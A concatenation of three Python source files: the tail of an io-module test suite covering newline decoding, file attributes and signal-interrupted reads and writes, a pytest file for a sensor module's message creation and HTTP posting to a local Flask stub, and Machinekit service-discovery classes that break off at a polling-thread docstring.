    def check_newline_decoding_utf8(self, decoder):
        # UTF-8 specific tests for a newline decoder
        def _check_decode(b, s, **kwargs):
            # We exercise getstate() / setstate() as well as decode()
            state = decoder.getstate()
            self.assertEqual(decoder.decode(b, **kwargs), s)
            decoder.setstate(state)
            self.assertEqual(decoder.decode(b, **kwargs), s)
        # multi-byte sequences fed one byte at a time
        _check_decode(b'\xe8\xa2\x88', "\u8888")
        _check_decode(b'\xe8', "")
        _check_decode(b'\xa2', "")
        _check_decode(b'\x88', "\u8888")
        _check_decode(b'\xe8', "")
        _check_decode(b'\xa2', "")
        _check_decode(b'\x88', "\u8888")
        _check_decode(b'\xe8', "")
        # incomplete sequence at EOF must raise
        self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
        decoder.reset()
        # newline translation: '\r', '\r\n' -> '\n'; a pending '\r' is
        # held back until the next byte (or final=True) disambiguates it
        _check_decode(b'\n', "\n")
        _check_decode(b'\r', "")
        _check_decode(b'', "\n", final=True)
        _check_decode(b'\r', "\n", final=True)
        _check_decode(b'\r', "")
        _check_decode(b'a', "\na")
        _check_decode(b'\r\r\n', "\n\n")
        _check_decode(b'\r', "")
        _check_decode(b'\r', "\n")
        _check_decode(b'\na', "\na")
        _check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
        _check_decode(b'\xe8\xa2\x88', "\u8888")
        _check_decode(b'\n', "\n")
        _check_decode(b'\xe8\xa2\x88\r', "\u8888")
        _check_decode(b'\n', "\n")

    def check_newline_decoding(self, decoder, encoding):
        """Feed input piecewise and check the decoder's `newlines` attribute
        accumulates the kinds of line endings seen, in any encoding
        (or on str input when *encoding* is None)."""
        result = []
        if encoding is not None:
            encoder = codecs.getincrementalencoder(encoding)()
            def _decode_bytewise(s):
                # Decode one byte at a time
                for b in encoder.encode(s):
                    result.append(decoder.decode(bytes([b])))
        else:
            encoder = None
            def _decode_bytewise(s):
                # Decode one char at a time
                for c in s:
                    result.append(decoder.decode(c))
        self.assertEqual(decoder.newlines, None)
        _decode_bytewise("abc\n\r")
        self.assertEqual(decoder.newlines, '\n')
        _decode_bytewise("\nabc")
        self.assertEqual(decoder.newlines, ('\n', '\r\n'))
        _decode_bytewise("abc\r")
        self.assertEqual(decoder.newlines, ('\n', '\r\n'))
        _decode_bytewise("abc")
        self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
        _decode_bytewise("abc\r")
        self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
        decoder.reset()
        input = "abc"
        if encoder is not None:
            encoder.reset()
            input = encoder.encode(input)
        self.assertEqual(decoder.decode(input), "abc")
        self.assertEqual(decoder.newlines, None)

    def test_newline_decoder(self):
        encodings = (
            # None meaning the IncrementalNewlineDecoder takes unicode input
            # rather than bytes input
            None, 'utf-8', 'latin-1',
            'utf-16', 'utf-16-le', 'utf-16-be',
            'utf-32', 'utf-32-le', 'utf-32-be',
        )
        for enc in encodings:
            decoder = enc and codecs.getincrementaldecoder(enc)()
            decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
            self.check_newline_decoding(decoder, enc)
        decoder = codecs.getincrementaldecoder("utf-8")()
        decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
        self.check_newline_decoding_utf8(decoder)
        self.assertRaises(TypeError, decoder.setstate, 42)

    def test_newline_bytes(self):
        # Issue 5433: Excessive optimization in IncrementalNewlineDecoder
        # (characters whose low byte looks like '\r'/'\n' must pass through)
        def _check(dec):
            self.assertEqual(dec.newlines, None)
            self.assertEqual(dec.decode("\u0D00"), "\u0D00")
            self.assertEqual(dec.newlines, None)
            self.assertEqual(dec.decode("\u0A00"), "\u0A00")
            self.assertEqual(dec.newlines, None)
        dec = self.IncrementalNewlineDecoder(None, translate=False)
        _check(dec)
        dec = self.IncrementalNewlineDecoder(None, translate=True)
        _check(dec)

    def test_translate(self):
        # issue 35062: any truthy `translate` value enables translation,
        # and 0 disables it
        for translate in (-2, -1, 1, 2):
            decoder = codecs.getincrementaldecoder("utf-8")()
            decoder = self.IncrementalNewlineDecoder(decoder, translate)
            self.check_newline_decoding_utf8(decoder)
        decoder = codecs.getincrementaldecoder("utf-8")()
        decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
        self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
    # Runs the shared tests against the C implementation; the
    # IncrementalNewlineDecoder attribute is injected by load_tests().
    pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
    # Runs the shared tests against the pure-Python implementation; the
    # IncrementalNewlineDecoder attribute is injected by load_tests().
    pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
    """Miscellaneous io-module tests shared by the C and Python
    implementations (self.io / self.open are injected by load_tests())."""

    def tearDown(self):
        support.unlink(support.TESTFN)

    def test___all__(self):
        """Every name in io.__all__ must exist and be of the expected kind."""
        for name in self.io.__all__:
            obj = getattr(self.io, name, None)
            self.assertIsNotNone(obj, name)
            if name == "open":
                continue
            elif "error" in name.lower() or name == "UnsupportedOperation":
                self.assertTrue(issubclass(obj, Exception), name)
            elif not name.startswith("SEEK_"):
                self.assertTrue(issubclass(obj, self.IOBase))

    def test_attributes(self):
        """Check mode/name attributes across the raw/buffered/text layers."""
        f = self.open(support.TESTFN, "wb", buffering=0)
        self.assertEqual(f.mode, "wb")
        f.close()
        # "U" mode is deprecated; a DeprecationWarning is expected
        with support.check_warnings(('', DeprecationWarning)):
            f = self.open(support.TESTFN, "U")
        self.assertEqual(f.name,            support.TESTFN)
        self.assertEqual(f.buffer.name,     support.TESTFN)
        self.assertEqual(f.buffer.raw.name, support.TESTFN)
        self.assertEqual(f.mode,            "U")
        self.assertEqual(f.buffer.mode,     "rb")
        self.assertEqual(f.buffer.raw.mode, "rb")
        f.close()
        f = self.open(support.TESTFN, "w+")
        self.assertEqual(f.mode,            "w+")
        self.assertEqual(f.buffer.mode,     "rb+") # Does it really matter?
        self.assertEqual(f.buffer.raw.mode, "rb+")
        g = self.open(f.fileno(), "wb", closefd=False)
        self.assertEqual(g.mode,     "wb")
        self.assertEqual(g.raw.mode, "wb")
        self.assertEqual(g.name,     f.fileno())
        self.assertEqual(g.raw.name, f.fileno())
        f.close()
        g.close()

    def test_io_after_close(self):
        """Every operation on a closed file must raise ValueError, for all
        layer/mode/buffering combinations."""
        for kwargs in [
                {"mode": "w"},
                {"mode": "wb"},
                {"mode": "w", "buffering": 1},
                {"mode": "w", "buffering": 2},
                {"mode": "wb", "buffering": 0},
                {"mode": "r"},
                {"mode": "rb"},
                {"mode": "r", "buffering": 1},
                {"mode": "r", "buffering": 2},
                {"mode": "rb", "buffering": 0},
                {"mode": "w+"},
                {"mode": "w+b"},
                {"mode": "w+", "buffering": 1},
                {"mode": "w+", "buffering": 2},
                {"mode": "w+b", "buffering": 0},
            ]:
            f = self.open(support.TESTFN, **kwargs)
            f.close()
            self.assertRaises(ValueError, f.flush)
            self.assertRaises(ValueError, f.fileno)
            self.assertRaises(ValueError, f.isatty)
            self.assertRaises(ValueError, f.__iter__)
            if hasattr(f, "peek"):
                self.assertRaises(ValueError, f.peek, 1)
            self.assertRaises(ValueError, f.read)
            if hasattr(f, "read1"):
                self.assertRaises(ValueError, f.read1, 1024)
                self.assertRaises(ValueError, f.read1)
            if hasattr(f, "readall"):
                self.assertRaises(ValueError, f.readall)
            if hasattr(f, "readinto"):
                self.assertRaises(ValueError, f.readinto, bytearray(1024))
            if hasattr(f, "readinto1"):
                self.assertRaises(ValueError, f.readinto1, bytearray(1024))
            self.assertRaises(ValueError, f.readline)
            self.assertRaises(ValueError, f.readlines)
            self.assertRaises(ValueError, f.readlines, 1)
            self.assertRaises(ValueError, f.seek, 0)
            self.assertRaises(ValueError, f.tell)
            self.assertRaises(ValueError, f.truncate)
            self.assertRaises(ValueError, f.write,
                              b"" if "b" in kwargs['mode'] else "")
            self.assertRaises(ValueError, f.writelines, [])
            self.assertRaises(ValueError, next, f)

    def test_blockingioerror(self):
        # Various BlockingIOError issues
        # (a reference cycle through the exception must still be collectable)
        class C(str):
            pass
        c = C("")
        b = self.BlockingIOError(1, c)
        c.b = b
        b.c = c
        wr = weakref.ref(c)
        del c, b
        support.gc_collect()
        self.assertIsNone(wr(), wr)

    def test_abcs(self):
        # Test the visible base classes are ABCs.
        self.assertIsInstance(self.IOBase, abc.ABCMeta)
        self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
        self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
        self.assertIsInstance(self.TextIOBase, abc.ABCMeta)

    def _check_abc_inheritance(self, abcmodule):
        """Check that raw/buffered/text files are instances of exactly the
        expected ABCs from *abcmodule*."""
        with self.open(support.TESTFN, "wb", buffering=0) as f:
            self.assertIsInstance(f, abcmodule.IOBase)
            self.assertIsInstance(f, abcmodule.RawIOBase)
            self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
            self.assertNotIsInstance(f, abcmodule.TextIOBase)
        with self.open(support.TESTFN, "wb") as f:
            self.assertIsInstance(f, abcmodule.IOBase)
            self.assertNotIsInstance(f, abcmodule.RawIOBase)
            self.assertIsInstance(f, abcmodule.BufferedIOBase)
            self.assertNotIsInstance(f, abcmodule.TextIOBase)
        with self.open(support.TESTFN, "w") as f:
            self.assertIsInstance(f, abcmodule.IOBase)
            self.assertNotIsInstance(f, abcmodule.RawIOBase)
            self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
            self.assertIsInstance(f, abcmodule.TextIOBase)

    def test_abc_inheritance(self):
        # Test implementations inherit from their respective ABCs
        self._check_abc_inheritance(self)

    def test_abc_inheritance_official(self):
        # Test implementations inherit from the official ABCs of the
        # baseline "io" module.
        self._check_abc_inheritance(io)

    def _check_warn_on_dealloc(self, *args, **kwargs):
        """Deallocating an unclosed file must emit a ResourceWarning whose
        message contains the file's repr."""
        f = open(*args, **kwargs)
        r = repr(f)
        with self.assertWarns(ResourceWarning) as cm:
            f = None
            support.gc_collect()
        self.assertIn(r, str(cm.warning.args[0]))

    def test_warn_on_dealloc(self):
        self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
        self._check_warn_on_dealloc(support.TESTFN, "wb")
        self._check_warn_on_dealloc(support.TESTFN, "w")

    def _check_warn_on_dealloc_fd(self, *args, **kwargs):
        fds = []
        def cleanup_fds():
            for fd in fds:
                try:
                    os.close(fd)
                except OSError as e:
                    if e.errno != errno.EBADF:
                        raise
        self.addCleanup(cleanup_fds)
        r, w = os.pipe()
        fds += r, w
        self._check_warn_on_dealloc(r, *args, **kwargs)
        # When using closefd=False, there's no warning
        r, w = os.pipe()
        fds += r, w
        with support.check_no_resource_warning(self):
            open(r, *args, closefd=False, **kwargs)

    def test_warn_on_dealloc_fd(self):
        self._check_warn_on_dealloc_fd("rb", buffering=0)
        self._check_warn_on_dealloc_fd("rb")
        self._check_warn_on_dealloc_fd("r")

    def test_pickling(self):
        # Pickling file objects is forbidden
        for kwargs in [
                {"mode": "w"},
                {"mode": "wb"},
                {"mode": "wb", "buffering": 0},
                {"mode": "r"},
                {"mode": "rb"},
                {"mode": "rb", "buffering": 0},
                {"mode": "w+"},
                {"mode": "w+b"},
                {"mode": "w+b", "buffering": 0},
            ]:
            for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
                with self.open(support.TESTFN, **kwargs) as f:
                    self.assertRaises(TypeError, pickle.dumps, f, protocol)

    def test_nonblock_pipe_write_bigbuf(self):
        self._test_nonblock_pipe_write(16*1024)

    def test_nonblock_pipe_write_smallbuf(self):
        self._test_nonblock_pipe_write(1024)

    # NOTE(review): the skip decorator sits on this helper rather than on
    # the two test_* methods above; calling a skipped helper raises
    # SkipTest inside the test, which still skips it — confirm intended.
    @unittest.skipUnless(hasattr(os, 'set_blocking'),
                         'os.set_blocking() required for this test')
    def _test_nonblock_pipe_write(self, bufsize):
        """Write through a buffered non-blocking pipe, handling partial
        writes (BlockingIOError), and verify everything arrives intact."""
        sent = []
        received = []
        r, w = os.pipe()
        os.set_blocking(r, False)
        os.set_blocking(w, False)
        # To exercise all code paths in the C implementation we need
        # to play with buffer sizes.  For instance, if we choose a
        # buffer size less than or equal to _PIPE_BUF (4096 on Linux)
        # then we will never get a partial write of the buffer.
        rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
        wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
        with rf, wf:
            for N in 9999, 73, 7574:
                try:
                    i = 0
                    while True:
                        msg = bytes([i % 26 + 97]) * N
                        sent.append(msg)
                        wf.write(msg)
                        i += 1
                except self.BlockingIOError as e:
                    self.assertEqual(e.args[0], errno.EAGAIN)
                    self.assertEqual(e.args[2], e.characters_written)
                    # keep only the prefix that was actually written
                    sent[-1] = sent[-1][:e.characters_written]
                    received.append(rf.read())
                    msg = b'BLOCKED'
                    wf.write(msg)
                    sent.append(msg)
            while True:
                try:
                    wf.flush()
                    break
                except self.BlockingIOError as e:
                    self.assertEqual(e.args[0], errno.EAGAIN)
                    self.assertEqual(e.args[2], e.characters_written)
                    self.assertEqual(e.characters_written, 0)
                    received.append(rf.read())
            received += iter(rf.read, None)
        sent, received = b''.join(sent), b''.join(received)
        self.assertEqual(sent, received)
        self.assertTrue(wf.closed)
        self.assertTrue(rf.closed)

    def test_create_fail(self):
        # 'x' mode fails if file is existing
        with self.open(support.TESTFN, 'w'):
            pass
        self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')

    def test_create_writes(self):
        # 'x' mode opens for writing
        with self.open(support.TESTFN, 'xb') as f:
            f.write(b"spam")
        with self.open(support.TESTFN, 'rb') as f:
            self.assertEqual(b"spam", f.read())

    def test_open_allargs(self):
        # there used to be a buffer overflow in the parser for rawmode
        self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
    """MiscIOTest bound to the C implementation, plus C-only regressions."""
    io = io

    def test_readinto_buffer_overflow(self):
        # Issue #18025: a read() result larger than the target buffer must
        # raise ValueError instead of overflowing it.
        class BadReader(self.io.BufferedIOBase):
            def read(self, n=-1):
                return b'x' * 10**6
        bufio = BadReader()
        b = bytearray(2)
        self.assertRaises(ValueError, bufio.readinto, b)

    def check_daemon_threads_shutdown_deadlock(self, stream_name):
        # Issue #23309: deadlocks at shutdown should be avoided when a
        # daemon thread and the main thread both write to a file.
        code = """if 1:
            import sys
            import time
            import threading
            from test.support import SuppressCrashReport
            file = sys.{stream_name}
            def run():
                while True:
                    file.write('.')
                    file.flush()
            crash = SuppressCrashReport()
            crash.__enter__()
            # don't call __exit__(): the crash occurs at Python shutdown
            thread = threading.Thread(target=run)
            thread.daemon = True
            thread.start()
            time.sleep(0.5)
            file.write('!')
            file.flush()
            """.format_map(locals())
        res, _ = run_python_until_end("-c", code)
        err = res.err.decode()
        if res.rc != 0:
            # Failure: should be a fatal error, not a deadlock/crash
            self.assertIn("Fatal Python error: could not acquire lock "
                          "for <_io.BufferedWriter name='<{stream_name}>'> "
                          "at interpreter shutdown, possibly due to "
                          "daemon threads".format_map(locals()),
                          err)
        else:
            # Success: stderr may only contain the '.'/'!' progress output
            self.assertFalse(err.strip('.!'))

    def test_daemon_threads_shutdown_stdout_deadlock(self):
        self.check_daemon_threads_shutdown_deadlock('stdout')

    def test_daemon_threads_shutdown_stderr_deadlock(self):
        self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
    """MiscIOTest bound to the pure-Python implementation (_pyio)."""
    io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
    """Interaction of buffered I/O with POSIX signals (EINTR handling,
    reentrancy, signal-handler exceptions)."""

    def setUp(self):
        self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)

    def tearDown(self):
        signal.signal(signal.SIGALRM, self.oldalrm)

    def alarm_interrupt(self, sig, frame):
        # raise ZeroDivisionError from the signal handler
        1/0

    # NOTE(review): the parameter name `bytes` shadows the builtin inside
    # this method (historical CPython code).
    def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
        """Check that a partial write, when it gets interrupted, properly
        invokes the signal handler, and bubbles up the exception raised
        in the latter."""
        read_results = []
        def _read():
            s = os.read(r, 1)
            read_results.append(s)
        t = threading.Thread(target=_read)
        t.daemon = True
        r, w = os.pipe()
        fdopen_kwargs["closefd"] = False
        large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
        try:
            wio = self.io.open(w, **fdopen_kwargs)
            if hasattr(signal, 'pthread_sigmask'):
                # create the thread with SIGALRM signal blocked
                signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
                t.start()
                signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
            else:
                t.start()
            # Fill the pipe enough that the write will be blocking.
            # It will be interrupted by the timer armed above.  Since the
            # other thread has read one byte, the low-level write will
            # return with a successful (partial) result rather than an EINTR.
            # The buffered IO layer must check for pending signal
            # handlers, which in this case will invoke alarm_interrupt().
            signal.alarm(1)
            try:
                self.assertRaises(ZeroDivisionError, wio.write, large_data)
            finally:
                signal.alarm(0)
                t.join()
            # We got one byte, get another one and check that it isn't a
            # repeat of the first one.
            read_results.append(os.read(r, 1))
            self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
        finally:
            os.close(w)
            os.close(r)
            # This is deliberate. If we didn't close the file descriptor
            # before closing wio, wio would try to flush its internal
            # buffer, and block again.
            try:
                wio.close()
            except OSError as e:
                if e.errno != errno.EBADF:
                    raise

    def test_interrupted_write_unbuffered(self):
        self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)

    def test_interrupted_write_buffered(self):
        self.check_interrupted_write(b"xy", b"xy", mode="wb")

    def test_interrupted_write_text(self):
        self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")

    @support.no_tracing
    def check_reentrant_write(self, data, **fdopen_kwargs):
        """A signal handler writing to the same buffered object must either
        fail with a 'reentrant call' RuntimeError or propagate the
        handler's own exception."""
        def on_alarm(*args):
            # Will be called reentrantly from the same thread
            wio.write(data)
            1/0
        signal.signal(signal.SIGALRM, on_alarm)
        r, w = os.pipe()
        wio = self.io.open(w, **fdopen_kwargs)
        try:
            signal.alarm(1)
            # Either the reentrant call to wio.write() fails with RuntimeError,
            # or the signal handler raises ZeroDivisionError.
            with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
                while 1:
                    for i in range(100):
                        wio.write(data)
                        wio.flush()
                    # Make sure the buffer doesn't fill up and block further writes
                    os.read(r, len(data) * 100)
            exc = cm.exception
            if isinstance(exc, RuntimeError):
                self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
        finally:
            signal.alarm(0)
            wio.close()
            os.close(r)

    def test_reentrant_write_buffered(self):
        self.check_reentrant_write(b"xy", mode="wb")

    def test_reentrant_write_text(self):
        self.check_reentrant_write("xy", mode="w", encoding="ascii")

    def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
        """Check that a buffered read, when it gets interrupted (either
        returning a partial result or EINTR), properly invokes the signal
        handler and retries if the latter returned successfully."""
        r, w = os.pipe()
        fdopen_kwargs["closefd"] = False
        def alarm_handler(sig, frame):
            os.write(w, b"bar")
        signal.signal(signal.SIGALRM, alarm_handler)
        try:
            rio = self.io.open(r, **fdopen_kwargs)
            os.write(w, b"foo")
            signal.alarm(1)
            # Expected behaviour:
            # - first raw read() returns partial b"foo"
            # - second raw read() returns EINTR
            # - third raw read() returns b"bar"
            self.assertEqual(decode(rio.read(6)), "foobar")
        finally:
            signal.alarm(0)
            rio.close()
            os.close(w)
            os.close(r)

    def test_interrupted_read_retry_buffered(self):
        self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
                                          mode="rb")

    def test_interrupted_read_retry_text(self):
        self.check_interrupted_read_retry(lambda x: x,
                                          mode="r")

    def check_interrupted_write_retry(self, item, **fdopen_kwargs):
        """Check that a buffered write, when it gets interrupted (either
        returning a partial result or EINTR), properly invokes the signal
        handler and retries if the latter returned successfully."""
        select = support.import_module("select")
        # A quantity that exceeds the buffer size of an anonymous pipe's
        # write end.
        N = support.PIPE_MAX_SIZE
        r, w = os.pipe()
        fdopen_kwargs["closefd"] = False
        # We need a separate thread to read from the pipe and allow the
        # write() to finish.  This thread is started after the SIGALRM is
        # received (forcing a first EINTR in write()).
        read_results = []
        write_finished = False
        error = None
        def _read():
            try:
                while not write_finished:
                    while r in select.select([r], [], [], 1.0)[0]:
                        s = os.read(r, 1024)
                        read_results.append(s)
            except BaseException as exc:
                nonlocal error
                error = exc
        t = threading.Thread(target=_read)
        t.daemon = True
        def alarm1(sig, frame):
            signal.signal(signal.SIGALRM, alarm2)
            signal.alarm(1)
        def alarm2(sig, frame):
            t.start()
        large_data = item * N
        signal.signal(signal.SIGALRM, alarm1)
        try:
            wio = self.io.open(w, **fdopen_kwargs)
            signal.alarm(1)
            # Expected behaviour:
            # - first raw write() is partial (because of the limited pipe buffer
            #   and the first alarm)
            # - second raw write() returns EINTR (because of the second alarm)
            # - subsequent write()s are successful (either partial or complete)
            written = wio.write(large_data)
            self.assertEqual(N, written)
            wio.flush()
            write_finished = True
            t.join()
            self.assertIsNone(error)
            self.assertEqual(N, sum(len(x) for x in read_results))
        finally:
            signal.alarm(0)
            write_finished = True
            os.close(w)
            os.close(r)
            # This is deliberate. If we didn't close the file descriptor
            # before closing wio, wio would try to flush its internal
            # buffer, and could block (in case of failure).
            try:
                wio.close()
            except OSError as e:
                if e.errno != errno.EBADF:
                    raise

    def test_interrupted_write_retry_buffered(self):
        self.check_interrupted_write_retry(b"x", mode="wb")

    def test_interrupted_write_retry_text(self):
        self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
    """SignalsTest bound to the C implementation."""
    io = io
class PySignalsTest(SignalsTest):
    """SignalsTest bound to the pure-Python implementation."""
    io = pyio

    # Handling reentrancy issues would slow down _pyio even more, so the
    # tests are disabled.
    test_reentrant_write_buffered = None
    test_reentrant_write_text = None
def load_tests(*args):
    """unittest load_tests hook: bind either the C (`io`) or Python
    (`pyio`) namespace plus the matching mock classes onto each test class
    (by its C*/Py* name prefix) and return the combined suite."""
    tests = (CIOTest, PyIOTest, APIMismatchTest,
             CBufferedReaderTest, PyBufferedReaderTest,
             CBufferedWriterTest, PyBufferedWriterTest,
             CBufferedRWPairTest, PyBufferedRWPairTest,
             CBufferedRandomTest, PyBufferedRandomTest,
             StatefulIncrementalDecoderTest,
             CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
             CTextIOWrapperTest, PyTextIOWrapperTest,
             CMiscIOTest, PyMiscIOTest,
             CSignalsTest, PySignalsTest,
             )
    # Put the namespaces of the IO module we are testing and some useful mock
    # classes in the __dict__ of each test.
    mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
             MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
             SlowFlushRawIO)
    all_members = io.__all__ + ["IncrementalNewlineDecoder"]
    c_io_ns = {name : getattr(io, name) for name in all_members}
    py_io_ns = {name : getattr(pyio, name) for name in all_members}
    globs = globals()
    c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
    py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
    # Avoid turning open into a bound method.
    py_io_ns["open"] = pyio.OpenWrapper
    for test in tests:
        if test.__name__.startswith("C"):
            for name, obj in c_io_ns.items():
                setattr(test, name, obj)
        elif test.__name__.startswith("Py"):
            for name, obj in py_io_ns.items():
                setattr(test, name, obj)
    suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
    return suite
# Allow running this test file directly (load_tests builds the suite).
if __name__ == "__main__":
    unittest.main()
|
test_sensor.py | from test_data.test_sensor_1 import SensorDummy1
from threading import Thread
import json
import time
from flask import Flask, request
cloud_gateway_ip = 'localhost'
cloud_gateway_port = 5000
class TestSensor:
    """Tests for the sensor module: event-message construction and the
    HTTP registration/event endpoints (exercised against a throwaway
    Flask app running in a daemon thread)."""

    @staticmethod
    def _get_dummy_sensor():
        # Build a SensorDummy1 configured against the module-level
        # cloud gateway address.
        sensor = SensorDummy1()
        sensor.set_module_id(1)
        sensor.set_send_interval(0.5)
        sensor.set_reads_per_minute(480)
        sensor.set_module_name('test_get_sensor')
        sensor.set_cloud_gateway_ip(cloud_gateway_ip)
        sensor.set_cloud_gateway_port(cloud_gateway_port)
        return sensor

    @staticmethod
    def _get_test_api(host, port, route):
        """Return (thread, messages): a daemon thread running a one-route
        Flask app that records every POST body into *messages*."""
        app = Flask('test_api')
        messages = []
        @app.route(route, methods=['POST'])
        def receive_device_registration():
            messages.append(request.get_data())
            return json.dumps({'success': True, 'id': 0}), 200, {'ContentType': 'application/json'},
        return Thread(target=app.run, kwargs={'host': host, 'port': port}, daemon=True), messages

    def test_int_message(self):
        """
        test value of type int
        """
        sensor = self._get_dummy_sensor()
        list_msg = sensor.create_event_messages({'test': 23})
        msg = json.loads(list_msg[0])
        assert len(list_msg) == 1
        assert msg['module_name'] == 'test_get_sensor'
        assert msg['value_type'] == 'int'
        assert msg['tag'] == 'test'
        # values are serialized as strings in the message payload
        assert msg['value'] == '23'

    def test_float_message(self):
        """
        test value of type float
        """
        sensor = self._get_dummy_sensor()
        msg_list = sensor.create_event_messages({'test': 23.3})
        msg = json.loads(msg_list[0])
        assert msg['value_type'] == 'float'
        assert msg['value'] == '23.3'

    def test_str_message(self):
        """
        test value of type str
        """
        sensor = self._get_dummy_sensor()
        msg_list = sensor.create_event_messages({'test': 'asdf'})
        msg = json.loads(msg_list[0])
        assert msg['value_type'] == 'str'
        assert msg['value'] == 'asdf'

    def test_list_message(self):
        """
        test that a multi-entry reading produces one message per tag
        """
        sensor = self._get_dummy_sensor()
        msg_list = sensor.create_event_messages({'test_1': 23.3, 'test_2': 'wat'})
        msg_0 = json.loads(msg_list[0])
        msg_1 = json.loads(msg_list[1])
        assert msg_0['value_type'] == 'float'
        assert msg_0['value'] == '23.3'
        assert msg_1['value_type'] == 'str'
        assert msg_1['value'] == 'wat'

    def test_device_registration(self):
        """
        Tests if the sensor module actually sends a registration message via http
        """
        sensor = self._get_dummy_sensor()
        sensor.set_cloud_gateway_port(5001)  # avoid clashing with other tests
        test_api, messages = self._get_test_api(
            sensor.cloud_gateway_ip, sensor.cloud_gateway_port, '/repository/devices')
        test_api.start()
        # NOTE(review): fixed sleeps make this timing-dependent and
        # potentially flaky on slow machines.
        time.sleep(1)
        sensor.register()
        time.sleep(1)
        for msg in messages:
            print(json.loads(msg.decode()))
        assert len(messages) > 0
        assert json.loads(messages[0].decode())['module_name'] == 'test_get_sensor'
        sensor.stopped.set()
        # the Flask daemon thread never exits; join() just times out
        test_api.join(timeout=1)

    def test_event_sending(self):
        """
        Tests if the sensor module actually sends the values from get_data and sends them via http
        """
        sensor = self._get_dummy_sensor()
        sensor.set_cloud_gateway_port(5002)  # avoid clashing with other tests
        test_api, messages = self._get_test_api(
            sensor.cloud_gateway_ip, sensor.cloud_gateway_port, '/repository/events')
        test_api.start()
        # NOTE(review): fixed sleeps make this timing-dependent and
        # potentially flaky on slow machines.
        time.sleep(1)
        sensor.start()
        time.sleep(1)
        for msg in messages:
            print(json.loads(msg.decode()))
        assert len(messages) > 0
        assert json.loads(messages[0].decode())['module_name'] == 'test_get_sensor'
        sensor.stopped.set()
        # the Flask daemon thread never exits; join() just times out
        test_api.join(timeout=1)
|
MachinekitInstance.py | # MachinekitInstance
#
# The classes in this file deal with service discovery and keep track of all discovered Machinekit
# instances and their associated endpoints.
import MachinekitPreferences
import copy
import itertools
import json
import threading
import time
import urllib.request
import zeroconf
class ServiceEndpoint(object):
    '''Plain value object describing one service endpoint of an MK instance.'''

    def __init__(self, service, name, addr, prt, properties):
        self.service = service
        self.name = name
        self.addr = addr
        self.prt = prt
        self.properties = properties
        # Both keys are required members of the bytes-keyed property dict.
        self.dsn = properties[b'dsn']
        self.uuid = properties[b'instance']

    def __str__(self):
        return "{}@{}:{}".format(self.service, self.address(), self.port())

    def addressRaw(self):
        '''Return the endpoint address exactly as it was discovered.'''
        return self.addr

    def address(self):
        '''Return the endpoint address as a dotted IPv4 string.'''
        if type(self.addr) is str:
            return self.addr
        # Raw form: a 4-element byte sequence, one octet per element.
        return "{}.{}.{}.{}".format(self.addr[0], self.addr[1], self.addr[2], self.addr[3])

    def port(self):
        '''Return the endpoint port number.'''
        return self.prt
class MachinekitInstance(object):
    '''Representation of a discovered MK instance, tying all associated services together.'''

    def __init__(self, uuid, properties):
        self.uuid = uuid
        self.properties = properties
        self.endpoint = {}            # service name -> ServiceEndpoint
        self.lock = threading.Lock()  # guards self.endpoint

    def __str__(self):
        with self.lock:
            names = sorted(ep.service for ep in self.endpoint.values())
            return "MK(%s): %s" % (self.uuid.decode(), names)

    def _addService(self, properties, name, address, port):
        service = properties[b'service'].decode()
        with self.lock:
            self.endpoint[service] = ServiceEndpoint(service, name, address, port, properties)

    def _removeService(self, name):
        '''Drop the (first) endpoint whose zeroconf name matches `name`.'''
        with self.lock:
            key = next((k for k, ep in self.endpoint.items() if ep.name == name), None)
            if key is not None:
                del self.endpoint[key]

    def endpointFor(self, service):
        '''endpointFor(service) ... return the MK endpoint for the given service.'''
        with self.lock:
            return self.endpoint.get(service)

    def services(self):
        '''services() ... returns the list of service names discovered for this MK instance.'''
        with self.lock:
            return list(self.endpoint)
def serviceThread(monitor):
    '''Background worker: poll each explicitly configured host's Machinekit REST
    endpoint (http://<host>/machinekit) roughly once per second and keep the
    monitor's instance/endpoint bookkeeping in sync with what the host reports.

    monitor ... a ServiceMonitor; its .lock guards .explicit and .instance.
    Never returns - intended to be run as a daemon thread.
    '''
